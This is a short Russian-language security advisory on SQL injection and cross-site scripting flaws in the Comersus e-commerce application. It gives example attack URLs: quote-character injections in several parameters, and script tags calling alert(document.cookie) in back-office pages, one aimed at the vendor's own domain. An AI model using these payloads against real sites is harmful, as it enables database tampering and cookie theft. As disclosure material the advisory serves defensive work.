Программа: Comersus
Обнаруженные уязвимости позволяют
удаленному пользователю произвести XSS
нападение и выполнить произвольные SQL
команды в базе данных приложения.
1. SQL-инъекция возможна при обработке
входных данных в параметрах email, idProduct, name и
message. Удаленный пользователь может с
помощью специально сформированного URL
выполнить произвольные SQL команды в базе
данных приложения.
Пример:
http://[target]/comersus6/store/comersus_optAffiliate
RegistrationExec.asp?name=1&email='&Submit= Join%20now%21
http://[target]/comersus6/store/comersus_optReview ReadExec.asp?idProduct='&description=Dr%252E%2
BSolomon%2560s%2BVirex%2B6%252E0%2 B%25 28For%2BMa
2. Удаленный пользователь может с помощью
специально сформированного URL выполнить
произвольный HTML сценарий в браузере жертвы
в контексте безопасности уязвимого сайта.
Пример:
www.comersus.com/backofficetest/backOfficePlus/
comersus_backoffice_listAssignedPricesToCustomer.asp? idCustomer=7&name=><script>alert(document.cookie);
</script>
http://[target]/backofficetest/backOfficePlus/
comersus_backoffice_message.asp?message=> <script >alert(document.cookie);</script>